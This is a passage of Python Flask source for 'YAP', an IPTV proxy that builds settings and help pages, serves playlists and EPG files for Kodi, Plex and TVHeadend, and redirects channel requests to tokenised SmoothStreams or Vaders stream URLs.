html.write("<tr><td>EPG - %s/epg.xml</td></tr>" % urljoin(SERVER_HOST, SERVER_PATH))
html.write("<tr><td> </td><td> </td></tr>")
html.write("<tr><td>TVHeadend<sup>1</sup></td><td>%s/tvh.m3u8</td></tr>" % urljoin(SERVER_HOST, SERVER_PATH))
html.write("<tr><td> </td><td> </td></tr>")
html.write(
"<tr><td rowspan='2'>Remote Internet access<sup>2</sup></td><td>m3u8 - %s/external.m3u8</td></tr>" % urljoin(
EXT_HOST, SERVER_PATH))
html.write("<tr><td>EPG - %s/epg.xml</td></tr>" % urljoin(EXT_HOST, SERVER_PATH))
html.write("<tr><td> </td><td> </td></tr>")
html.write(
"<tr><td rowspan='2'>Combined Outputs<sup>2</sup></td><td>m3u8 - %s/combined.m3u8</td></tr>" % urljoin(
SERVER_HOST, SERVER_PATH))
html.write("<tr><td>epg - %s/combined.xml</td></tr>" % urljoin(SERVER_HOST, SERVER_PATH))
html.write("<tr><td> </td><td> </td></tr>")
html.write(
"<tr><td>Static Playlist</td><td>m3u8 - %s/static.m3u8</td></tr>" % urljoin(SERVER_HOST, SERVER_PATH))
html.write("<tr><td> </td><td> </td></tr>")
html.write(
"<tr><td rowspan='2'>TVHProxy<sup>3</sup></td><td>Tuner - %s</td></tr>" % urljoin(SERVER_HOST, 'tvh'))
html.write("<tr><td>EPG - http://%s:9981/xmltv/channels</td></tr>" % TVHURL)
html.write("<tr><td> </td><td> </td></tr>")
html.write("<tr><td>Test Playlist for troubleshooting</td><td>%s/test.m3u8</td></tr>" % urljoin(SERVER_HOST,
SERVER_PATH))
html.write("<tr><td> </td><td> </td></tr>")
html.write("<tr><td>Dynamic xspf, includes currently showing programs</td><td>%s/playlist.xspf</td></tr>" % urljoin(SERVER_HOST,
SERVER_PATH))
html.write("<tr><td>Static xspf</td><td>%s/static.xspf</td></tr>" % urljoin(SERVER_HOST,
SERVER_PATH))
html.write("<tr><td> </td><td> </td></tr>")
html.write("<tr><td>Note 1:</td><td>Requires FFMPEG installation and setup</td></tr>")
html.write("<tr><td>Note 2:</td><td>Requires External IP and port in advancedsettings</td></tr>")
html.write("<tr><td>Note 3:</td><td>Requires TVH proxy setup in advancedsettings</td></tr></table>")
html.write("</div></section></body></html>\n")
with open("./cache/adv_settings.html", "w") as html:
html.write("""<html>
<head>
<meta charset="UTF-8">
%s
<title>YAP</title>
</head>
<body>\n""" % (style,))
html.write('<section class="container"><div class="left-half">')
html.write("<h1>YAP Settings</h1>")
template = "<a href='{1}/{2}/{0}.html'>{3}</a>"
html.write("<p>" + template.format("settings",SERVER_HOST, SERVER_PATH,"Options") + " " + template.format("howto",SERVER_HOST, SERVER_PATH,"Instructions") + " " + template.format("channels",SERVER_HOST, SERVER_PATH,"Channels List") + " " + template.format("adv_channels",SERVER_HOST, SERVER_PATH,"Advanced Settings") + "</p>")
html.write('<form action="%s/%s/handle_data" method="post">' % (SERVER_HOST, SERVER_PATH))
channelmap = {}
chanindex = 0
adv_set = ["kodiuser", "kodipass", "ffmpegloc", "kodiport", "extram3u8url", "extram3u8name", "extram3u8file",
"extraxmlurl", "tvhredirect", "tvhaddress", "tvhuser", "tvhpass", "overridexml", "checkchannel"]
html.write('<table width="300" border="2">')
for setting in adv_set:
if setting.lower() == 'kodipass':
html.write('<tr><td>%s:</td><td><input name="%s" type="Password" value="%s"></td></tr>' % (
setting, setting, KODIPASS))
elif setting == "checkchannel":
html.write('<tr><td>%s:</td><td><select name="%s" size="1"><option value="True" %s>Enabled</option><option value="False" %s>Disabled</option></select></td></tr>' % (setting, setting, ' selected' if CHECK_CHANNEL == True else "", ' selected' if CHECK_CHANNEL == False else ""))
else:
val = "Unknown"
if setting == "kodiuser":
val = KODIUSER
elif setting == "kodiport":
val = KODIPORT
elif setting == "ffmpegloc":
val = FFMPEGLOC
elif setting == "extram3u8url":
val = EXTM3URL
elif setting == "extram3u8file":
val = EXTM3UFILE
elif setting == "extram3u8name":
val = EXTM3UNAME
elif setting == "extraxmlurl":
val = EXTXMLURL
elif setting == "tvhredirect":
val = TVHREDIRECT
elif setting == "tvhaddress":
val = TVHURL
elif setting == "tvhuser":
val = TVHUSER
elif setting == "tvhpass":
val = TVHPASS
elif setting == "overridexml":
val = OVRXML
if not (setting == "ffmpegloc" and not platform.system() == 'Windows'):
html.write('<tr><td>%s:</td><td><input name="%s" type="text" value="%s"></td></tr>' % (setting, setting, val))
html.write('</table>')
html.write('<input type="submit" value="Submit">')
html.write('</form>')
html.write("<p>You are running version (%s %s), the latest is %s</p>" % (type, __version__, latest_ver))
html.write("</br><p>Restarts can take a while, it is not immediate.</p>")
html.write('<form action="%s/%s/handle_data" method="post">' % (SERVER_HOST, SERVER_PATH))
html.write('<input type="hidden" name="restart" value="1">')
html.write('<input type="submit" value="Restart">')
html.write('</form>')
html.write('<form action="%s/%s/handle_data" method="post">' % (SERVER_HOST, SERVER_PATH))
html.write('<input type="hidden" name="restart" value="2">')
html.write('<input type="submit" value="Update + Restart">')
html.write('</form>')
html.write('<form action="%s/%s/handle_data" method="post">' % (SERVER_HOST, SERVER_PATH))
html.write('<input type="hidden" name="restart" value="3">')
html.write('<input type="submit" value="Update(Dev Branch) + Restart">')
html.write('</form>')
html.write('<p> </p>')
html.write('<p> </p>')
html.write('<p> </p>')
html.write('<p> </p>')
html.write(footer)
html.write("</div></section></body></html>\n")
with open("./cache/channels.html", "w") as html:
global chan_map
html.write("""<html><head><title>YAP</title><meta charset="UTF-8">%s</head><body>\n""" % (style,))
html.write("<h1>Channel List and Upcoming Shows</h1>")
template = "<a href='{1}/{2}/{0}.html'>{3}</a>"
html.write("<p>" + template.format("settings",SERVER_HOST, SERVER_PATH,"Options") + " " + template.format("howto",SERVER_HOST, SERVER_PATH,"Instructions") + " " + template.format("channels",SERVER_HOST, SERVER_PATH,"Channels List") + " " + template.format("adv_channels",SERVER_HOST, SERVER_PATH,"Advanced Settings") + "</p>")
html.write('<section class="container"><div class="left-half"><table width="300" border="1">')
template = "<td>{0}</td><td><a href='{2}/{3}/playlist.m3u8?ch={0}'><img src='{2}/{3}/{0}.png'></a></td></td>"
for i in chan_map:
if i%5 == 1:
html.write("<tr>")
html.write(template.format(chan_map[i].channum, chan_map[i].channame, SERVER_HOST, SERVER_PATH))
if i%5 == 0:
html.write("</tr>")
html.write("</table>")
html.write("</br>%s</div>" % footer)
html.write('<div class="right-half"><h3>Coming up</h3>')
template = "{0} - <a href='{2}/{3}/playlist.m3u8?ch={0}'>{1}</a></br>"
for i in chan_map:
prog = getProgram(i)
if prog.title != 'none':
try:
html.write(template.format(chan_map[i].channum, prog.title.encode('utf-8'), SERVER_HOST, SERVER_PATH))
except:
logger.exception(prog.title)
html.write("</div></section>")
html.write("</body></html>\n")
with open("./cache/index.html", "w") as html:
html.write("""<html><head><title>YAP</title><meta charset="UTF-8">%s</head><body>\n""" % (style,))
template = "<h2><a href='{1}/{2}/{0}.html'>{3}</a></h2>"
html.write("<h1>Welcome to YAP!</h1>")
html.write(template.format("settings",SERVER_HOST, SERVER_PATH,"Options"))
html.write(template.format("howto",SERVER_HOST, SERVER_PATH,"Instructions"))
html.write(template.format("channels",SERVER_HOST, SERVER_PATH,"Channels List"))
html.write(template.format("adv_channels", SERVER_HOST, SERVER_PATH, "Advanced Settings"))
html.write(footer)
html.write("</body></html>\n")
with open("./cache/howto.html", "w") as html:
html.write("""<html><head><title>YAP</title><meta charset="UTF-8">%s</head><body>\n""" % (style,))
template = "<a href='{1}/{2}/{0}.html'>{3}</a>"
html.write("<h1>Welcome to YAP!</h1>")
html.write("<p>" + template.format("settings",SERVER_HOST, SERVER_PATH,"Options") + " " + template.format("howto",SERVER_HOST, SERVER_PATH,"Instructions") + " " + template.format("channels",SERVER_HOST, SERVER_PATH,"Channels List") + " " + template.format("adv_channels",SERVER_HOST, SERVER_PATH,"Advanced Settings") + "</p>")
html.write("<h2>Work in progress.</h2>")
html.write("""<h2>Commandline Arguments</h2></br><p>'install' - forces recreation of the install function which creates certain files, such as the tvh internal grabber</br></br>
'headless' - uses command line for initial setup rather than gui</br></br>
'tvh' - each call to a piped channel will return channel 01 which is a 24/7 channel so will always generate a positive result, this allows TVH to create all services</p></br>""")
html.write("<h2><a href='https://seo-michael.co.uk/how-to-setup-livetv-pvr-simple-xbmc-kodi/'>Kodi Setup</a></h2>")
html.write("<p>Use this information to populate the settings:</p>")
html.write("<p>m3u8 - %s/kodi.m3u8</p>" % urljoin(SERVER_HOST, SERVER_PATH))
html.write("<p>EPG - %s/epg.xml</p>" % urljoin(SERVER_HOST, SERVER_PATH))
html.write('''<p>RTMP is an issue so there's a special playlist for it (kodi.m3u8), it has two of every channel in both rtmp and hls, in kodi Tv use the Left hand menu and select group or filter. Then select dynamic (forced hls) or static rtmp.For static_refresh channel (151) don't use it on the guide page, use it on the channel list page. Otherwise kodi will crash. This will lock kodi for about 20secs but refresh the playlist.</p>''')
html.write("<h2>Ensure you can get YAP working in Kodi or VLC first before attmepting Plex or TVHeadend!</h2>")
html.write("<h2><a href='https://imgur.com/a/OZkN0'>Plex Setup</a></h2>")
html.write("<p></p>")
html.write("<h2>TVHeadend Setup</h2>")
html.write("""<p>
In a nutshell here is how to do it on Ubuntu.</br>Replace USERNAME with your linux user:</br>
<b>1 Download the latest sstvProxy binary (exe) from:</b></br>
http://smoothstreams.tv/board/index.php?topic=1832.0</br>
Save it to:</br>
<blockquote><i>/home/USERNAME/Desktop/sstv</i></blockquote></br>
</br>
<b>2 Delete proxysettings.json</b> (only if you're coming from an older version of sstvproxy)</br>
<blockquote><i>sudo rm /home/USERNAME/Desktop/sstv/proxysettings.json</i></blockquote></br>
</br>
<b>3 Install ffmpeg:</b></br>
<blockquote><i>sudo apt install ffmpeg jq</i></blockquote></br>
</br>
<b>4 Install tvheadend:</b></br>
<blockquote><i>sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 379CE192D401AB61 </i></blockquote></br>
<blockquote><i>echo "deb https://dl.bintray.com/tvheadend/deb xenial release-4.2" | sudo tee -a /etc/apt/sources.list</i></blockquote></br>
<blockquote><i>sudo apt-get update</i></blockquote></br>
<blockquote><i>sudo apt-get install tvheadend</i></blockquote></br>
You will need to enter a username and password to manage tvheadend as part of this install process.</br>
Check for the presence of /usr/bin/tv_find_grabbers If it doesnt exist then run:</br>
<blockquote><i>"apt-get install xmltv-util" </i></blockquote></br>
</br>
<b>5 Run sstvProxy:</b></br>
<blockquote><i>sudo chmod +x /home/USERNAME/Desktop/sstv/sstvProxy </i></blockquote></br>
<blockquote><i>sudo /home/USERNAME/Desktop/sstv/sstvProxy tvh</i></blockquote> <i>note the 'tvh' switch will enable it to scan all 150 channels</i></br>
Go through the setup steps, this will also setup the internal EPG grabber for TVHeadend</br>
</br>
<b>6 Restart TVHeadend:</b></br>
<blockquote><i>systemctl stop tvheadend </i></blockquote></br>
<blockquote><i>systemctl start tvheadend </i></blockquote></br>
</br>
<b>7 Configure TVHeadend:</b></br>
On your Ubuntu server browse <blockquote><i>http://127.0.0.1:9981</i></blockquote></br>
Use the username and password you set in Step 4</br>
</br>
Configuration -> Channel / EPG -> EPG Grabber Modules</br>
On the left side, highlight 'Internal: XMLTV: SmoothstreamsTV'</br>
On the right side, tick 'Enabled'</br>
Click 'Save'</br>
Configuration -> DVB Inputs -> Networks</br>
Click 'Add'</br>
Type = IPTV Automatic Network</br>
Network Name = SmoothstreamsTV</br>
URL = http://127.0.0.1:99/sstv/tvh.m3u8</br>
Maximum # input streams = 3</br>
Click Create</br>
Click Force Scan if it doesn't start scanned for muxes - wait for all the muxes to be scanned - there are 150 channels</br>
Go to the 'Services' tab</br>
Map Services -> Map all services</br>
</br>
Configuration -> Channel / EPG -> EPG Grabber Modules</br>
Click the button labeled 'Re-run Internal EPG Grabbers'</br>
**This will take a while to process** View the log down the bottom of the page. After it has run you should now see the channels in the EPG.</br>
<b>8 Restart sstvProxy:</b></br>
<blockquote><i>sudo /home/USERNAME/Desktop/sstv/sstvProxy</i></blockquote> <i>note no 'tvh' switch this time</i></p>""")
html.write("<h2>Advanced Settings</h2>")
html.write("""<p>
You can have as many or as few as you want and the file itself is optional. If you don't care for the option then don't even include it in the file, just delete it.</br></br>
There now exists an advanced settings example file on git. If this is in the same folder as the proxy it will detect it on launch and parse any settings that are within. </br></br>
Currently the accepted settings are:</br>
Custom ffmpeg locations "ffmpegloc":"C:\\ffmpeg\\bin\\ffmpeg.exe" (note the double slashes)</br>
Custom kodi control username "kodiuser":"string"</br>
Custom kodi control password "kodipass":"string"</br>
</br>
If you want to output a playlist that combines the SSTV channels with another playlist you already have then these options are for you:</br>
A url source for the above "extram3u8url":"url/string"</br>
A group name for the above, in order to filter between them in client "extram3u8name":"string"</br>
A file source for the above, url has priority though "extram3u8file":"path/string"</br>
</br>
If you want to output an EPG that combines the SSTV channels with another EPG you already have then:</br>
A url source for the above "extraxmlurl":"url/string"</br>
</br>
If you wish to use feed YAP into TVH and then TVH into Plex use the below:</br>
TVH url you use "tvhaddress": "127.0.0.1"</br>
username "tvhuser": ""</br>
password "tvhpass": ""</br>
</br>
If you want to override the EPG with your own one then:</br>
A url source for the epg "overridexml":"url/string"</p>""")
html.write(footer)
html.write("</body></html>\n")
def close_menu(restart):
with open("./cache/close.html", "w") as html:
html.write("""<html><head><title>YAP</title><meta charset="UTF-8">%s</head><body>\n""" % (style,))
html.write("<h1>Data Saved</h1>")
if restart:
html.write("<h1>You have change either the IP or Port, please restart this program.</h1>")
else:
html.write("<p>m3u8 url is %s/playlist.m3u8</p>" % urljoin(SERVER_HOST, SERVER_PATH))
html.write("<p>kodi m3u8 url is %s/kodi.m3u8</p>" % urljoin(SERVER_HOST, SERVER_PATH))
html.write("<p>EPG url is %s/epg.xml</p>" % urljoin(SERVER_HOST, SERVER_PATH))
html.write("<p>Sports EPG url is %s/sports.xml</p>" % urljoin(SERVER_HOST, SERVER_PATH))
html.write("<p>Plex Live TV url is %s</p>" % urljoin(SERVER_HOST, SERVER_PATH))
html.write("<p>TVHeadend network url is %s/tvh.m3u8</p>" % urljoin(SERVER_HOST, SERVER_PATH))
html.write("<p>External m3u8 url is %s/external.m3u8</p>" % urljoin(EXT_HOST, SERVER_PATH))
html.write("<p>Combined m3u8 url is %s/combined.m3u8</p>" % urljoin(SERVER_HOST, SERVER_PATH))
html.write("<p>Combined epg url is %s/combined.xml</p>" % urljoin(SERVER_HOST, SERVER_PATH))
html.write("<p>Static m3u8 url is %s/static.m3u8</p>" % urljoin(SERVER_HOST, SERVER_PATH))
if TVHREDIRECT == True:
html.write("<p>TVH's own EPG url is http://%s:9981/xmltv/channels</p>" % TVHURL)
html.write("</body></html>\n")
def restart_program():
os.system('cls' if os.name == 'nt' else 'clear')
args = sys.argv[:]
print(args)
# logger.info('Re-spawning %s' % ' '.join(args))
# #
# # args.insert(0, sys.executable)
# # if sys.platform == 'win32':
# # args = ['"%s"' % arg for arg in args]
#
# os.execl(sys.executable, *([sys.executable] + sys.argv))
logger.info("YAP is restarting...")
FULL_PATH = sys.argv[0]
exe = sys.executable
args = [exe, FULL_PATH]
args += sys.argv[1:]
# Separate out logger so we can shutdown logger after
logger.info('Restarting YAP with %s', args)
# os.execv fails with spaced names on Windows
# https://bugs.python.org/issue19066
if os.name == 'nt':
subprocess.Popen(args, cwd=os.getcwd())
else:
os.execv(exe, args)
os._exit(0)
# os.execv(sys.executable, args)
############################################################
# CLIENT <-> SSTV BRIDGE
############################################################
@app.route('/sstv/handle_data', methods=['POST'])
def handle_data():
request_page = request.referrer
config = {}
inc_data = request.form
if 'restart' in inc_data:
if inc_data["restart"] == '3':
logger.info('Updating YAP Dev')
newfilename = ntpath.basename(latestfile)
devname = latestfile.replace('master', 'dev')
requests.urlretrieve(devname, os.path.join(os.path.dirname(sys.argv[0]), newfilename))
elif inc_data["restart"] == '2':
logger.info('Updating YAP')
newfilename = ntpath.basename(latestfile)
requests.urlretrieve(latestfile, os.path.join(os.path.dirname(sys.argv[0]), newfilename))
logger.info('Restarting YAP')
restart_program()
return
if request_page.endswith("adv_channels.html"):
logger.info("Received new adv settings from %s", request.environ.get('REMOTE_ADDR'))
restartrequired = False
with open('./advancedsettings.json', 'w') as fp:
dump(inc_data, fp)
adv_settings()
logger.info("Updated adv Settings file.")
else:
logger.info("Received new settings from %s", request.environ.get('REMOTE_ADDR'))
global playlist, kodiplaylist, QUAL, QUALLIMIT, USER, PASS, SRVR, SITE, STRM, LISTEN_IP, LISTEN_PORT, EXTIP, EXT_HOST, SERVER_HOST, EXTPORT
config["username"] = inc_data['Username']
config["password"] = inc_data['Password']
config["stream"] = inc_data['Stream']
for sub in serverList:
if sub[0] == inc_data['Server']:
config["server"] = sub[1]
for sub in providerList:
if sub[0] == inc_data['Service']:
config["service"] = sub[1]
for sub in qualityList:
if sub[0] == inc_data['Quality']:
config["quality"] = sub[1]
config["ip"] = inc_data['IP']
config["port"] = int(inc_data['Port'])
config["externalip"] = inc_data['ExternalIP']
config["externalport"] = inc_data['ExternalPort']
QUAL = config["quality"]
USER = config["username"]
PASS = config["password"]
SRVR = config["server"]
SITE = config["service"]
STRM = config["stream"]
if LISTEN_IP != config["ip"] or LISTEN_PORT != config["port"]:
restartrequired = True
else:
restartrequired = False
LISTEN_IP = config["ip"]
LISTEN_PORT = config["port"]
EXTIP = config["externalip"]
EXTPORT = config["externalport"]
EXT_HOST = "http://" + EXTIP + ":" + str(EXTPORT)
SERVER_HOST = "http://" + LISTEN_IP + ":" + str(LISTEN_PORT)
with open('./proxysettings.json', 'w') as fp:
dump(config, fp)
logger.info("Updated Settings file.")
check_token()
playlist = build_playlist(SERVER_HOST)
kodiplaylist = build_kodi_playlist()
if restartrequired:
logger.info("You have changed either the IP or Port, please restart this program.")
close_menu(True)
else:
close_menu(False)
return redirect(request_page, code=302)
# return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'close.html')
@app.route('/')
@app.route('/sstv')
def landing_page():
logger.info("Index was requested by %s", request.environ.get('REMOTE_ADDR'))
create_menu()
return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'index.html')
@app.route('/<request_file>')
def index(request_file):
logger.info("%s requested by %s at root" % (request_file, request.environ.get('REMOTE_ADDR')))
if request_file.lower() == 'lineup_status.json':
return status()
elif request_file.lower() == 'discover.json':
return discover()
elif request_file.lower() == 'lineup.json':
return lineup(chan_map)
elif request_file.lower() == 'lineup.post':
return lineup_post()
# logger.debug(request.headers)
elif request_file.lower() == 'device.xml':
return device()
elif request_file.lower() == 'favicon.ico':
return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'empty.png')
@app.route('/%s/<request_file>' % SERVER_PATH)
def bridge(request_file):
global playlist, token, chan_map, kodiplaylist, tvhplaylist, fallback
check_token()
try:
client = find_client(request.headers['User-Agent'])
except:
logger.debug("No user-agent provided by %s", request.environ.get('REMOTE_ADDR'))
client = 'unk'
if request_file.lower().endswith('.xspf'):
playlist = build_xspf(SERVER_HOST, request_file)
logger.info("XSPF playlist was requested by %s", request.environ.get('REMOTE_ADDR'))
return Response(playlist, mimetype='application/xspf+xml')
# return epg
if request_file.lower().startswith('epg.'):
logger.info("EPG was requested by %s", request.environ.get('REMOTE_ADDR'))
if not fallback:
dl_epg()
else:
logger.exception("EPG build, EPG download failed. Trying SSTV.")
dl_epg(2)
with open(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'epg.xml'), 'r+') as f:
content = f.read()
response = Response(content, mimetype='text/xml')
headers = dict(response.headers)
headers.update(
{"Access-Control-Expose-Headers": "Accept-Ranges, Content-Encoding, Content-Length, Content-Range",
"Access-Control-Allow-Origin": "*", "Access-Control-Allow-Headers": "Range",
"Access-Control-Allow-Methods": "GET, POST, OPTIONS, HEAD"})
response.headers = headers
return response
# return sports only epg
if request_file.lower() == 'sports.xml':
logger.info("Sports EPG was requested by %s", request.environ.get('REMOTE_ADDR'))
if not fallback:
dl_epg()
else:
logger.exception("Sports EPG build, EPG download failed. Trying SSTV.")
dl_epg(2)
return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'sports.xml')
# return combined epg
if request_file.lower() == 'combined.xml':
logger.info("Combined EPG was requested by %s", request.environ.get('REMOTE_ADDR'))
if not fallback:
dl_epg()
else:
logger.exception("Combined EPG build, EPG download failed. Trying SSTV.")
dl_epg(2)
obtain_epg()
return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'combined.xml')
# return icons
elif request_file.lower().endswith('.png'):
logger.debug("Icon %s was requested by %s" % (request_file, request.environ.get('REMOTE_ADDR')))
try:
return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), request_file)
except:
return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'empty.png')
elif request_file.lower() == 'favicon.ico':
return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'empty.png')
# return main menu
elif request_file.lower().startswith('index'):
logger.info("Index was requested by %s", request.environ.get('REMOTE_ADDR'))
create_menu()
return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'index.html')
# return settings menu
elif request_file.lower().startswith('settings'):
logger.info("Settings was requested by %s", request.environ.get('REMOTE_ADDR'))
create_menu()
return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'settings.html')
# return settings menu
elif request_file.lower().startswith('adv'):
logger.info("Adv_Settings was requested by %s", request.environ.get('REMOTE_ADDR'))
create_menu()
return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'adv_settings.html')
# return channels menu
elif request_file.lower().startswith('channels'):
logger.info("Channels was requested by %s", request.environ.get('REMOTE_ADDR'))
create_menu()
return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'channels.html')
# return howto menu
elif request_file.lower().startswith('howto'):
logger.info("Howto was requested by %s", request.environ.get('REMOTE_ADDR'))
create_menu()
return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'howto.html')
# kodi static refresh
elif request_file.lower().startswith('refresh'):
# kodi force rescan 423-434
logger.info("Refresh was requested by %s", request.environ.get('REMOTE_ADDR'))
load_token()
check_token()
rescan_channels()
return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'empty.png')
# returns static playlist
elif request_file.lower().startswith('static'):
staticplaylist = build_static_playlist()
logger.info("Static playlist was requested by %s", request.environ.get('REMOTE_ADDR'))
return Response(staticplaylist, mimetype='application/x-mpegURL')
# returns test playlist
elif request_file.lower() == "test.m3u8":
testplaylist = build_test_playlist([SERVER_HOST, EXT_HOST])
logger.info("Static playlist was requested by %s", request.environ.get('REMOTE_ADDR'))
return Response(testplaylist, mimetype='application/x-mpegURL')
# returns kodi playlist
elif request_file.lower().startswith('kodi'):
kodiplaylist = build_kodi_playlist()
logger.info("Kodi channels playlist was requested by %s", request.environ.get('REMOTE_ADDR'))
return Response(kodiplaylist, mimetype='application/x-mpegURL')
# returns combined playlist
elif request_file.lower() == 'combined.m3u8':
extraplaylist = build_playlist(SERVER_HOST) + obtain_m3u8()
logger.info("Combined channels playlist was requested by %s", request.environ.get('REMOTE_ADDR'))
logger.info("Sending playlist to %s", request.environ.get('REMOTE_ADDR'))
return Response(extraplaylist, mimetype='application/x-mpegURL')
# returns external playlist
elif request_file.lower().startswith('external'):
extplaylist = build_playlist(EXT_HOST)
logger.info("External channels playlist was requested by %s", request.environ.get('REMOTE_ADDR'))
return Response(extplaylist, mimetype='application/x-mpegURL')
# returns tvh playlist
elif request_file.lower().startswith('tvh'):
tvhplaylist = build_tvh_playlist()
logger.info("TVH channels playlist was requested by %s", request.environ.get('REMOTE_ADDR'))
return Response(tvhplaylist, mimetype='application/x-mpegURL')
elif request_file.lower() == 'playlist.m3u8' or request_file.lower().startswith('ch'):
# returning Dynamic channels
if request.args.get('ch') or request_file.lower().startswith('ch'):
if request_file.lower().startswith('ch'):
chan = request_file.lower().replace("ch", "").replace(".m3u8", "")
sanitized_channel = "{:02.0f}".format(int(chan))
else:
chan = request.args.get('ch')
sanitized_channel = ("0%d" % int(request.args.get('ch'))) if int(
request.args.get('ch')) < 10 else request.args.get('ch')
check_token()
if SITE == 'vaders':
logger.info("Channel %s playlist was requested by %s", sanitized_channel,
request.environ.get('REMOTE_ADDR'))
vaders_url = "http://vapi.vaders.tv/play/{0}.{1}?"
tokenDict = {"username": "vsmystreams_" + USER, "password": PASS}
jsonToken = json.dumps(tokenDict)
tokens = base64.b64encode(jsonToken.encode('utf-8'))
strm = 'ts' if STRM == 'mpegts' else 'm3u8'
if request.args.get('strm'):
strm = request.args.get('strm')
tokens = urllib.parse.urlencode({"token":str(tokens)[1:]})
if int(chan) > 150:
channel = chan
else:
channel = vaders_channels[chan]
channel_url = vaders_url.format(channel, strm) + tokens
print(channel_url)
return redirect(channel_url, code=302)
qual = 1
if request.args.get('qual'):# and int(sanitized_channel) <= QUALLIMIT:
qual = request.args.get('qual')
elif int(sanitized_channel) <= QUALLIMIT:
qual = QUAL
if request.args.get('strm') and request.args.get('strm') == 'rtmp':
strm = 'rtmp'
rtmpTemplate = 'rtmp://{0}.smoothstreams.tv:3625/{1}/ch{2}q{3}.stream?wmsAuthSign={4}'
pure_url = rtmpTemplate.format(SRVR, SITE, sanitized_channel, qual, token['hash'])
output_url = rtmpTemplate.format(SRVR, SITE, sanitized_channel, qual, token['hash'])
elif request.args.get('strm') and request.args.get('strm') == 'mpegts':
strm = 'mpegts'
return auto(sanitized_channel, qual)
else:
strm = 'hls'
hlsTemplate = 'https://{0}.smoothstreams.tv:443/{1}/ch{2}q{3}.stream/playlist.m3u8?wmsAuthSign={4}=='
pure_url = hlsTemplate.format(SRVR, SITE, sanitized_channel, qual, token['hash'])
output_url = pure_url
# channel fixing for dead server/Quality
if CHECK_CHANNEL and not checkChannelURL(pure_url) and strm == 'hls':
output_url = fixURL(strm, sanitized_channel, qual, token['hash'])
# creates the output playlist files and returns it as a variable as well
if strm == 'hls':
output_file = create_channel_file(output_url)
logger.info("Channel %s playlist was requested by %s", sanitized_channel,
request.environ.get('REMOTE_ADDR'))
# useful for debugging
logger.debug("URL returned: %s" % output_url)
if request.args.get('type'):
returntype = request.args.get('type')
else:
returntype = 3
# different return types as different clients require it. Expect this to change as clients fail on certain things like dynamic hls
if strm == 'rtmp' or request.args.get('response'):
response = redirect(output_url, code=302)
headers = dict(response.headers)
headers.update({'Content-Type': 'application/x-mpegURL', "Access-Control-Allow-Origin": "*"})
response.headers = headers
logger.debug("returning response")
return response
elif returntype == 1 or client == 'kodi':
# hlsTemplate = 'https://{0}.smoothstreams.tv:443/{1}/ch{2}q{3}.stream/playlist.m3u8?wmsAuthSign={4}=='
# ss_url = hlsTemplate.format(SRVR, SITE, sanitized_channel, qual, token['hash'])
# some players are having issues with http/https redirects
logger.debug("returning hls url redirect")
return redirect(output_url, code=302)
elif returntype == 2 or client == 'vlc':
logger.debug("returning m3u8 as file")
return send_from_directory(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), 'playlist.m3u8')
elif returntype == 4:
logger.debug("returning hls url")
return output_url
else:
# some players are having issues with http/https redirects
logger.debug("returning m3u8 as variable")
return output_file
# returning dynamic playlist
else:
playlist = build_playlist(SERVER_HOST)
logger.info("All channels playlist was requested by %s", request.environ.get('REMOTE_ADDR'))
return Response(playlist, mimetype='application/x-mpegURL')
# HDHomeRun emulated json files for Plex Live tv.
elif request_file.lower() == 'lineup_status.json':
return status()
elif request_file.lower() == 'discover.json':
return discover()
elif request_file.lower() == 'lineup.json':
if TVHREDIRECT == True:
return tvh_lineup()
else:
return lineup(chan_map)
elif request_file.lower() == 'lineup.post':
return lineup_post()
elif request_file.lower() == 'device.xml':
return device()
else:
logger.info("Unknown requested %r by %s", request_file, request.environ.get('REMOTE_ADDR'))
abort(404, "Unknown request")
@app.route('/tvh/<request_file>')
def tvh_returns(request_file):
if request_file.lower() == 'lineup_status.json':
return status()
elif request_file.lower() == 'discover.json':
return tvh_discover()
elif request_file.lower() == 'lineup.json':
return tvh_lineup()
elif request_file.lower() == 'lineup.post':
return lineup_post()
elif request_file.lower() == 'device.xml':
return tvh_device()
else:
logger.info("Unknown requested %r by %s", request_file, request.environ.get('REMOTE_ADDR'))
abort(404, "Unknown request")
@app.route('/%s/auto/<request_file>' % SERVER_PATH)
# returns a piped stream, used for TVH/Plex Live TV
def auto(request_file, qual=""):
logger.debug("starting pipe function")
check_token()
channel = request_file.replace("v", "")
logger.info("Channel %s playlist was requested by %s", channel,
request.environ.get('REMOTE_ADDR'))
sanitized_channel = ("0%d" % int(channel)) if int(channel) < 10 else channel
sanitized_qual = '1'
if int(channel) <= QUALLIMIT:
if qual == "":
sanitized_qual = QUAL
else:
sanitized_qual = qual
template = "https://{0}.smoothstreams.tv:443/{1}/ch{2}q{3}.stream/playlist.m3u8?wmsAuthSign={4}"
url = template.format(SRVR, SITE, sanitized_channel, sanitized_qual, token['hash'])
logger.debug(
"sanitized_channel: %s sanitized_qual: %s QUAL: %s qual: %s" % (sanitized_channel, sanitized_qual, QUAL, qual))
if CHECK_CHANNEL and not checkChannelURL(url):
url = fixURL('hls', sanitized_channel, qual, token['hash'])
logger.debug(url)
# try:
# urllib.request.urlopen(url, timeout=2).getcode()
# except:
# a = 1
# except timeout:
# #special arg for tricking tvh into saving every channel first time
# print("timeout")
# sanitized_channel = '01'
# sanitized_qual = '3'
# url = template.format(SRVR, SITE, sanitized_channel,sanitized_qual, token['hash'])
if args.tvh:
logger.debug("TVH Trickery happening")
sanitized_channel = '01'
sanitized_qual = '3'
